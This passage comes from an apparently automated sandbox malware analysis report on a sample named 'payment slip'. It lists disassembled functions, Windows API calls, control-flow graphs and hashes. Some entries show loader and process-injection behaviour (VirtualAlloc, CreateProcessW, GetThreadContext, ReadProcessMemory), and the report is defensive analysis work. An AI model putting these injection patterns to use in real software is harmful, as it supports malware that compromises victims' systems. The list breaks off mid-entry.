                                        • GetLastError.KERNEL32 ref: 0007076F
                                        • __dosmaperr.LIBCMT ref: 00070776
                                        • GetFileType.KERNELBASE(00000000), ref: 00070782
                                        • GetLastError.KERNEL32 ref: 0007078C
                                        • __dosmaperr.LIBCMT ref: 00070795
                                        • CloseHandle.KERNEL32(00000000), ref: 000707B5
                                        • CloseHandle.KERNEL32(?), ref: 000708FF
                                        • GetLastError.KERNEL32 ref: 00070931
                                        • __dosmaperr.LIBCMT ref: 00070938
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                        • Instruction ID: fa726f59b53b6d2206048bbe8ad249dcafc65ce9e29808d9753e5efb6f17c705
                                        • Opcode Fuzzy Hash: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                        • Instruction Fuzzy Hash: FCA13632E14145CFDF19AF68DC51BAE3BE0AB06320F14825DF8599B392CB399D12CB95
                                        Function 00032B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00032B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00032B9D
                                        • LoadIconW.USER32(00000063), ref: 00032BB3
                                        • LoadIconW.USER32(000000A4), ref: 00032BC5
                                        • LoadIconW.USER32(000000A2), ref: 00032BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00032BEF
                                        • RegisterClassExW.USER32(?), ref: 00032C40
                                          • Part of subcall function 00032CD4: GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                          • Part of subcall function 00032CD4: RegisterClassExW.USER32(00000030), ref: 00032D31
                                          • Part of subcall function 00032CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                          • Part of subcall function 00032CD4: InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                          • Part of subcall function 00032CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                          • Part of subcall function 00032CD4: LoadIconW.USER32(000000A9), ref: 00032D85
                                          • Part of subcall function 00032CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                        • Instruction ID: bb108381398789bc5f55446103ec3de5fbed9f83fab81ddc65a00a6f0bd037f6
                                        • Opcode Fuzzy Hash: 03e5510eb6c2ab133b740f23610c8b17c7556e3263f66d1543759a03a4e249da
                                        • Instruction Fuzzy Hash: D9211A70E10314BBEB109FA5EC59EA97FF4FB48B60F04011AF544AAAA0D7F94580DF90
                                        Function 00033170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 443 33170-33185 444 33187-3318a 443->444 445 331e5-331e7 443->445 446 331eb 444->446 447 3318c-33193 444->447 445->444 448 331e9 445->448 452 331f1-331f6 446->452 453 72dfb-72e23 call 318e2 call 4e499 446->453 449 33265-3326d PostQuitMessage 447->449 450 33199-3319e 447->450 451 331d0-331d8 DefWindowProcW 448->451 458 33219-3321b 449->458 455 331a4-331a8 450->455 456 72e7c-72e90 call 9bf30 450->456 457 331de-331e4 451->457 459 331f8-331fb 452->459 460 3321d-33244 SetTimer RegisterWindowMessageW 452->460 488 72e28-72e2f 453->488 462 331ae-331b3 455->462 463 72e68-72e77 call 9c161 455->463 456->458 481 72e96 456->481 458->457 466 33201-33214 KillTimer call 330f2 call 33c50 459->466 467 72d9c-72d9f 459->467 460->458 464 33246-33251 CreatePopupMenu 460->464 471 72e4d-72e54 462->471 472 331b9-331be 462->472 463->458 464->458 466->458 474 72dd7-72df6 MoveWindow 467->474 475 72da1-72da5 467->475 471->451 484 72e5a-72e63 call 90ad7 471->484 479 33253-33263 call 3326f 472->479 480 331c4-331ca 472->480 474->458 482 72da7-72daa 475->482 483 72dc6-72dd2 SetFocus 475->483 479->458 480->451 480->488 481->451 482->480 489 72db0-72dc1 call 318e2 482->489 483->458 484->451 488->451 492 72e35-72e48 call 330f2 call 33837 488->492 489->458 492->451
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0003316A,?,?), ref: 000331D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0003316A,?,?), ref: 00033204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00033227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0003316A,?,?), ref: 00033232
                                        • CreatePopupMenu.USER32 ref: 00033246
                                        • PostQuitMessage.USER32(00000000), ref: 00033267
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                        • Instruction ID: db750c1197e4bf579c0d9d6f71e4ec79259d06a7072dcb1c3a4ded07151caa17
                                        • Opcode Fuzzy Hash: 83b9cfc4e039b1c6e94e70ff9ac0e468b4cccbbe290988c0f1ea91866748836a
                                        • Instruction Fuzzy Hash: 3C417B31604200BBEB361B78DD8DFBE3A9DF705314F044125F94A9A5E2CBBC8E8097A5
                                        Function 00068D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 499 68d45-68d55 500 68d57-68d6a call 5f2c6 call 5f2d9 499->500 501 68d6f-68d71 499->501 517 690f1 500->517 503 68d77-68d7d 501->503 504 690d9-690e6 call 5f2c6 call 5f2d9 501->504 503->504 507 68d83-68dae 503->507 522 690ec call 627ec 504->522 507->504 510 68db4-68dbd 507->510 513 68dd7-68dd9 510->513 514 68dbf-68dd2 call 5f2c6 call 5f2d9 510->514 515 690d5-690d7 513->515 516 68ddf-68de3 513->516 514->522 521 690f4-690f9 515->521 516->515 520 68de9-68ded 516->520 517->521 520->514 525 68def-68e06 520->525 522->517 528 68e23-68e2c 525->528 529 68e08-68e0b 525->529 532 68e2e-68e45 call 5f2c6 call 5f2d9 call 627ec 528->532 533 68e4a-68e54 528->533 530 68e15-68e1e 529->530 531 68e0d-68e13 529->531 536 68ebf-68ed9 530->536 531->530 531->532 561 6900c 532->561 534 68e56-68e58 533->534 535 68e5b-68e79 call 63820 call 629c8 * 2 533->535 534->535 569 68e96-68ebc call 69424 535->569 570 68e7b-68e91 call 5f2d9 call 5f2c6 535->570 538 68edf-68eef 536->538 539 68fad-68fb6 call 6f89b 536->539 538->539 542 68ef5-68ef7 538->542 552 68fb8-68fca 539->552 553 69029 539->553 542->539 546 68efd-68f23 542->546 546->539 550 68f29-68f3c 546->550 550->539 557 68f3e-68f40 550->557 552->553 555 68fcc-68fdb GetConsoleMode 552->555 559 6902d-69045 ReadFile 553->559 555->553 560 68fdd-68fe1 555->560 557->539 562 68f42-68f6d 557->562 564 69047-6904d 559->564 565 690a1-690ac GetLastError 559->565 560->559 566 68fe3-68ffd ReadConsoleW 560->566 567 6900f-69019 call 629c8 561->567 562->539 568 68f6f-68f82 562->568 564->565 573 6904f 564->573 571 690c5-690c8 565->571 572 690ae-690c0 call 5f2d9 call 5f2c6 565->572 576 6901e-69027 566->576 577 68fff GetLastError 566->577 567->521 568->539 581 68f84-68f86 568->581 569->536 570->561 578 69005-6900b call 5f2a3 571->578 579 690ce-690d0 571->579 572->561 575 69052-69064 573->575 575->567 586 69066-6906a 575->586 576->575 577->578 578->561 579->567 581->539 589 68f88-68fa8 581->589 592 69083-6908e 586->592 593 6906c-6907c call 68a61 586->593 589->539 598 69090 call 68bb1 592->598 599 6909a-6909f call 688a1 592->599 604 6907f-69081 593->604 605 69095-69098 598->605 599->605 604->567 605->604
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                        • Instruction ID: 64925fcf7e326d840ddc240013e141eac246c497ad2e8fe0d16f71647c6cfce6
                                        • Opcode Fuzzy Hash: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                        • Instruction Fuzzy Hash: 14C10474D04249AFEF21DFA8C845BEDBBF6AF09310F044199E855A7392CB748D41CB60
                                        Function 03B025F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 607 3b025f0-3b0269e call 3b00000 610 3b026a5-3b026cb call 3b03500 CreateFileW 607->610 613 3b026d2-3b026e2 610->613 614 3b026cd 610->614 621 3b026e4 613->621 622 3b026e9-3b02703 VirtualAlloc 613->622 615 3b0281d-3b02821 614->615 616 3b02863-3b02866 615->616 617 3b02823-3b02827 615->617 623 3b02869-3b02870 616->623 619 3b02833-3b02837 617->619 620 3b02829-3b0282c 617->620 624 3b02847-3b0284b 619->624 625 3b02839-3b02843 619->625 620->619 621->615 626 3b02705 622->626 627 3b0270a-3b02721 ReadFile 622->627 628 3b02872-3b0287d 623->628 629 3b028c5-3b028da 623->629 632 3b0285b 624->632 633 3b0284d-3b02857 624->633 625->624 626->615 634 3b02723 627->634 635 3b02728-3b02768 VirtualAlloc 627->635 636 3b02881-3b0288d 628->636 637 3b0287f 628->637 630 3b028ea-3b028f2 629->630 631 3b028dc-3b028e7 VirtualFree 629->631 631->630 632->616 633->632 634->615 640 3b0276a 635->640 641 3b0276f-3b0278a call 3b03750 635->641 638 3b028a1-3b028ad 636->638 639 3b0288f-3b0289f 636->639 637->629 643 3b028ba-3b028c0 638->643 644 3b028af-3b028b8 638->644 642 3b028c3 639->642 640->615 647 3b02795-3b0279f 641->647 642->623 643->642 644->642 648 3b027a1-3b027d0 call 3b03750 647->648 649 3b027d2-3b027e6 call 3b03560 647->649 648->647 655 3b027e8 649->655 656 3b027ea-3b027ee 649->656 655->615 657 3b027f0-3b027f4 FindCloseChangeNotification 656->657 658 3b027fa-3b027fe 656->658 657->658 659 3b02800-3b0280b VirtualFree 658->659 660 3b0280e-3b02817 658->660 659->660 660->610 660->615
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03B026C1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03B028E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                        • Instruction ID: 44fbf7bc95cc8c098bbea80235598c6638618a15db91dec604da8fad81f16e84
                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                        • Instruction Fuzzy Hash: 11A10774E00209EBDB14CFA4C998BAEBBB5FF48308F2485A9E505BB2C0D7759A45CF54
                                        Function 00032C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 671 32c63-32cd3 CreateWindowExW * 2 ShowWindow * 2
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00032C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00032CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00031CAD,?), ref: 00032CCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                        • Instruction ID: 6845dfbea31787348dc91c0bdc516c72a14f93ceb97e91f6744dcaeced51df53
                                        • Opcode Fuzzy Hash: 78c5d2abaf06eaf68bb65a583cfa2785917e04fcd31451cca0bc2177e9b5d0fd
                                        • Instruction Fuzzy Hash: F4F0DA755403907AFB311717AC0CE773EBDE7C6F60B00105EF944AA9A0C6B91891DAB0
                                        Function 03B023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 786 3b023b0-3b024f2 call 3b00000 call 3b022a0 CreateFileW 793 3b024f4 786->793 794 3b024f9-3b02509 786->794 795 3b025a9-3b025ae 793->795 797 3b02510-3b0252a VirtualAlloc 794->797 798 3b0250b 794->798 799 3b0252c 797->799 800 3b0252e-3b02545 ReadFile 797->800 798->795 799->795 801 3b02547 800->801 802 3b02549-3b02583 call 3b022e0 call 3b012a0 800->802 801->795 807 3b02585-3b0259a call 3b02330 802->807 808 3b0259f-3b025a7 ExitProcess 802->808 807->808 808->795
                                        APIs
                                          • Part of subcall function 03B022A0: Sleep.KERNELBASE(000001F4), ref: 03B022B1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03B024E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: AVHN1SCHS2QV2RV1QNI0JKSU
                                        • API String ID: 2694422964-4111582466
                                        • Opcode ID: 23ec43a938651ed3db32912e164342f5ebf26aba61e99d7c90ae6129bc79d76b
                                        • Instruction ID: a8050244539a4ddb2a0f56e837da23fcde72e015044f9199d892f6c3b8ced5e8
                                        • Opcode Fuzzy Hash: 23ec43a938651ed3db32912e164342f5ebf26aba61e99d7c90ae6129bc79d76b
                                        • Instruction Fuzzy Hash: 56516030D04248DAEF11DBE4C859BDEBBB9AF15304F0445D9E2487B2C1D7B91B48CBA5
                                        Function 0003DFD0 Relevance: 8.4, APIs: 2, Strings: 2, Instructions: 1414COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (R$Variable must be of type 'Object'.
                                        • API String ID: 0-1029580346
                                        • Opcode ID: e4fdb35eb095dca47740685b97908ebecfb3067fe505b54bd2ceca2d9aee6b85
                                        • Instruction ID: b70732e3c6c73155f2b5c02d18ff0ccf88ff8bf0f8e541acd94b363d0cad2302
                                        • Opcode Fuzzy Hash: e4fdb35eb095dca47740685b97908ebecfb3067fe505b54bd2ceca2d9aee6b85
                                        • Instruction Fuzzy Hash: 06C2AC71E00245CFCB25DF98C884AADB7F5BF48700F248269E946AB392D775EE41CB91
                                        Function 000A2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1320 a2947-a29b9 call 71f50 call a25d6 call 4fe0b call 35722 call a274e call 3511f call 55232 1335 a29bf-a29c6 call a2e66 1320->1335 1336 a2a6c-a2a73 call a2e66 1320->1336 1341 a29cc-a2a6a call 5d583 call 54983 call 59038 call 5d583 call 59038 * 2 1335->1341 1342 a2a75-a2a77 1335->1342 1336->1342 1343 a2a7c 1336->1343 1346 a2a7f-a2b3a call 350f5 * 8 call a3017 call 5e5eb 1341->1346 1345 a2cb6-a2cb7 1342->1345 1343->1346 1347 a2cd5-a2cdb 1345->1347 1385 a2b3c-a2b3e 1346->1385 1386 a2b43-a2b5e call a2792 1346->1386 1350 a2cdd-a2ce8 call 4fdcd call 4fe14 1347->1350 1351 a2cf0-a2cf6 1347->1351 1363 a2ced 1350->1363 1363->1351 1385->1345 1389 a2bf0-a2bfc call 5e678 1386->1389 1390 a2b64-a2b6c 1386->1390 1397 a2bfe-a2c0d DeleteFileW 1389->1397 1398 a2c12-a2c16 1389->1398 1391 a2b6e-a2b72 1390->1391 1392 a2b74 1390->1392 1394 a2b79-a2b97 call 350f5 1391->1394 1392->1394 1404 a2b99-a2b9e 1394->1404 1405 a2bc1-a2bd7 call a211d call 5dbb3 1394->1405 1397->1345 1400 a2c18-a2c7e call a25d6 call 5d2eb * 2 call a22ce 1398->1400 1401 a2c91-a2ca5 CopyFileW 1398->1401 1402 a2cb9-a2ccf DeleteFileW call a2fd8 1400->1402 1425 a2c80-a2c8f DeleteFileW 1400->1425 1401->1402 1403 a2ca7-a2cb4 DeleteFileW 1401->1403 1411 a2cd4 1402->1411 1403->1345 1408 a2ba1-a2bb4 call a28d2 1404->1408 1418 a2bdc-a2be7 1405->1418 1419 a2bb6-a2bbf 1408->1419 1411->1347 1418->1390 1421 a2bed 1418->1421 1419->1405 1421->1389 1425->1345
                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2C05
                                        • DeleteFileW.KERNEL32(?), ref: 000A2C87
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A2C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000A2CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: 04a5a4924947204bd526907e1221ba3fedaec2db1e69bcd380edb067762f4925
                                        • Instruction ID: 44bbc15a8ef6fa58dec5c0ca6bdba68796d5ead040726d42f86482692e384646
                                        • Opcode Fuzzy Hash: 04a5a4924947204bd526907e1221ba3fedaec2db1e69bcd380edb067762f4925
                                        • Instruction Fuzzy Hash: 5EB15D71900119ABDF25DBE8CC85EDEB7BDEF49350F1040A6FA09E6152EB319A448F61
                                        Function 000310F3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153comCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                          • Part of subcall function 00031BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                          • Part of subcall function 00031B4A: RegisterWindowMessageW.USER32(00000004,?,000312C4), ref: 00031BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0003136A
                                        • OleInitialize.OLE32 ref: 00031388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 000724AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID: P
                                        • API String ID: 1986988660-1343716551
                                        • Opcode ID: 9c8ac74295fa6038bd5e047daae4856e988cd38b84ea2a70708afbd15b2545eb
                                        • Instruction ID: adebd1933317dabbf69f7c1e73af58d23cb3b17d076f0fa0e7f4a99294e1ac8b
                                        • Opcode Fuzzy Hash: 9c8ac74295fa6038bd5e047daae4856e988cd38b84ea2a70708afbd15b2545eb
                                        • Instruction Fuzzy Hash: CA71A2B4901200AFD385DF79ED45A953AE5FB8A340754812EE0CADBAB2EBFC4581CF41
                                        Function 00033B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00033B0F,SwapMouseButtons,00000004,?), ref: 00033B83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                        • Instruction ID: bb1aa22a2cd16c450adb9287a077885d5099cc7f7ab5b7ab6c21787d93d3e2bc
                                        • Opcode Fuzzy Hash: 3f5404f8c4f530ba5e77353ebea98b95d2b9230cbaf638e4313cfb4b4b22c779
                                        • Instruction Fuzzy Hash: AD112AB5510208FFEB618FA5DC84EAEB7BCEF44744F104459EA05D7110D3319E409760
                                        Function 03B012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03B01ACD
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03B01AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03B01B13
